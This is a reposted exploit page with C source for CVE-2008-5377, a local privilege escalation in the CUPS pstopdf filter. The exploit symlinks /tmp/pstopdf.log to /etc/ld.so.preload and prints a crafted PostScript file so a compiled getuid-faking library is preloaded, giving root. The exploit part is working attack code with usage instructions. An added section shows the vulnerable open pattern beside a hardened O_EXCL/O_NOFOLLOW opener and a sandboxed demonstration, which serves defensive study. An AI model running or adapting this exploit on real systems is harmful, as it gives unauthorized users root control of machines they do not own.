CUPS < 1.3.8-4 (pstopdf filter) Privilege Escalation Exploit
Source: http://jon.oberheide.org  Author: Oberheide  Published: 2008-12-24

/*
 * cve-2008-5377.c
 *
 * CUPS < 1.3.8-4 pstopdf filter exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Usage:
 *
 *   $ gcc cve-2008-5377.c -o cve-2008-5377
 *   $ ./cve-2008-5377
 *   $ id
 *   uid=0(root) gid=1000(vm) ...
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
 *
 *   pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
 *   a symlink attack on the /tmp/pstopdf.log temporary file.
 *
 * Operation:
 *
 *   The exploit creates and prints a malformed postscript document that will
 *   cause the CUPS pstopdf filter to write an error message out to its log
 *   file that contains the string /tmp/getuid.so.  However, since we also
 *   symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
 *   error message and malicious shared library path will be appended to the
 *   ld.so.preload file, allowing us to elevate privileges to root.
 *
 * Note:
 *
 *   This exploit only works under the (rare) conditions that cupsd executes
 *   external filters as a privileged user, a printer on the system uses the
 *   pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
 *   must be world readable.
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>

int
main(void)
{
 int ret;
 FILE *fp;
 struct stat log;

 /* malformed PostScript: pstopdf's error message will echo the payload path */
 fp = fopen("/tmp/cve-2008-5377.ps", "w");
 if(!fp) {
  printf("error: cannot open /tmp/cve-2008-5377.ps\n");
  goto cleanup;
 }
 fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
 fclose(fp);

 /* preloaded library that makes every process believe it runs as uid 0 */
 fp = fopen("/tmp/getuid.c", "w");
 if(!fp) {
  printf("error: cannot open /tmp/getuid.c\n");
  goto cleanup;
 }
 fprintf(fp, "int getuid(){return 0;}\n");
 fclose(fp);

 ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
 if (WEXITSTATUS(ret) != 0) {
  printf("error: cannot compile /tmp/getuid.c\n");
  goto cleanup;
 }

 /* the log name must be free so the symlink below can take its place */
 unlink("/tmp/pstopdf.log");
 ret = stat("/tmp/pstopdf.log", &log);
 if (ret != -1) {
  printf("error: /tmp/pstopdf.log already exists\n");
  goto cleanup;
 }

 ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
 if (ret == -1) {
  printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
  goto cleanup;
 }

 /* submitting the job runs the filter, which appends its log line to the link target */
 ret = system("lp < /tmp/cve-2008-5377.ps");
 if (WEXITSTATUS(ret) != 0) {
  printf("error: could not print /tmp/cve-2008-5377.ps\n");
  goto cleanup;
 }

cleanup:
 unlink("/tmp/cve-2008-5377.ps");
 unlink("/tmp/getuid.c");
 return 0;
}
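Added example, not part of Oberheide's exploit: the predictable-temp-file open that the attack above relies on, beside the hardened open pattern (O_EXCL plus O_NOFOLLOW) that makes a planted symlink fail closed. The function names and the scratch directory are ours; the two files stand in for /tmp/pstopdf.log and /etc/ld.so.preload.

```c
/* Added example, not part of Oberheide's exploit: the predictable-temp-file
 * pattern that CVE-2008-5377 abuses, next to a hardened opener that refuses
 * to follow a planted symlink.  Function names here are ours. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
/* Vulnerable pattern: a privileged process opens a fixed path in a shared
 * directory and follows whatever is there, so a symlink planted by an
 * unprivileged user redirects the write to the link's target. */
int open_log_trusting(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}
/* Hardened pattern: O_NOFOLLOW refuses a symlink at the final component and
 * O_EXCL refuses any pre-existing entry, so a planted name fails closed
 * (errno ELOOP or EEXIST) instead of becoming a write into another file. */
int open_log_nofollow(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_APPEND, 0600);
}
/* Stage the attack in a private scratch directory (constructed stand-ins for
 * /tmp/pstopdf.log and /etc/ld.so.preload) and compare both openers.  Returns
 * 1 when the trusting opener wrote through the symlink and the hardened one
 * refused, 0 otherwise, -1 if setup failed. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/preload-demo-XXXXXX", target[256], link[256];
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/ld.so.preload", dir);
    snprintf(link, sizeof link, "%s/pstopdf.log", dir);
    int fd = open(target, O_WRONLY | O_CREAT, 0600);   /* empty "preload" file */
    if (fd < 0 || close(fd) != 0 || symlink(target, link) != 0) return -1;
    int refused = open_log_nofollow(link) < 0 && (errno == ELOOP || errno == EEXIST);
    const char *payload = "/tmp/getuid.so\n";          /* what pstopdf would log */
    fd = open_log_trusting(link);
    if (fd >= 0) { if (write(fd, payload, strlen(payload)) < 0) perror("write"); close(fd); }
    struct stat st;
    int redirected = stat(target, &st) == 0 && st.st_size == (off_t)strlen(payload);
    unlink(link); unlink(target); rmdir(dir);
    return refused && redirected;
}
```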


CopyRight © 2002-2022 VFocuS.Net All Rights Reserved